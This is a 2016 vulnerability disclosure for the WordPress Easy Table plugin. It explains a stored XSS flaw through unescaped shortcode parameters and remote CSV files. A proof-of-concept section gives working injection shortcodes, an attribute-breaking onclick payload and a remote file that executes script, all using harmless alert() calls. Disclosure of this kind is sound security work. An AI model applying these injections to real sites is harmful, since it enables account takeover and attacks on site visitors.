Easy Table [Persistent XSS]
Description
Easy Table plugin is vulnerable to Persistent XSS attack.
Plugin allows users to easily create tables in posts, pages, widget etc. by providing a shortcode that uses a custom syntax to represent table rows, columns, headers etc. This shortcode accepts many parameters in order to give users more flexibility about the end result. The problem occurs because many of these parameters aren’t properly sanitized before stored in DB or printed in browser, thus allowing a malicious user to exploit this in order to perform a stored XSS attack.
An attacker in order to perform this attack must have the edit_posts
capability so typically it has to have at least the contributor role
assigned to him.
Plugin also offers a functionality to read table data from a remote file. File contents are parsed and printed without escaping html entities, providing a malicious user another entry point. This functionality is disabled by default and it requires a user with administrative rights to enabled it.
PoC
Create a post and enter the following shortcode:
[table class='class" onclick="alert(/XSS/)']
no,head1,head2,head3,head4
1,row1col1,row1col2,row1col3,100
[/table]
Or using a remote file if the appropriate option is enabled.
[table file='http://wp1.dev/mal.html']
no,head1,head2,head3,head4
1,row1col1,row1col2,row1col3,100
[/table]
The contents of the remote file are parsed as CSV file and not escaped before printing so the following response will get executed as JS code:
<script>alert('XSS')</script>
- 6 April 2016
- Pan Vag
- takien.com
- Easy Table
- WordPress 4.4.2